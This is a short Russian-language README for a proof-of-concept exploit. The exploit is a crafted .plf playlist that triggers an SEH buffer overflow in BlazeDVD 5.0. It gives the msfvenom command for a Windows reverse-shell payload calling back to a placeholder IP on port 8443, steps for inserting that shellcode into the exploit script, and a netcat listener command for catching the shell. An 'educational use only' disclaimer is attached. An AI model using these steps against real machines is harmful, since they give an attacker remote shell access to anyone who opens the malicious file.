
Доказательство концепции эксплойта переполнения буфера SEH для BlazeDVD 5.0 через специально подготовленный файл плейлиста .plf, генерирующий полезную нагрузку reverse shell с помощью msfvenom для образовательных целей в области безопасности.
Эксплойт Proof-of-Concept (PoC), нацеленный на уязвимость переполнения буфера в BlazeDVD версии 5.0 через специально созданный файл плейлиста .plf. Эксплойт использует перезапись SEH (Structured Exception Handler) для выполнения кода.
.plfЭтот код предоставлен только для образовательных и исследовательских целей. Любое неправомерное использование этого кода может нарушить местные или международные законы. Я не несу ответственности за ущерб, причиненный неправильным использованием.
Эксплойт создает вредоносный файл .plf, который при открытии в BlazeDVD вызывает переполнение буфера и перезаписывает SEH (Structured Exception Handler), перенаправляя выполнение на полезную нагрузку обратной оболочки (reverse shell).
Сгенерируйте шеллкод с помощью msfvenom
Используйте msfvenom для создания полезной нагрузки обратной оболочки в сыром формате, избегая недопустимых символов.
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
Замените шеллкод внутри скрипта эксплойта на вывод msfvenom.
Запустите Netcat (прослушиватель)
В другом терминале начните прослушивание на выбранном порту 8443:
nc -lvnp 8443
Поймайте обратную оболочку
В случае успеха обратная оболочка подключится к вашему прослушивателю.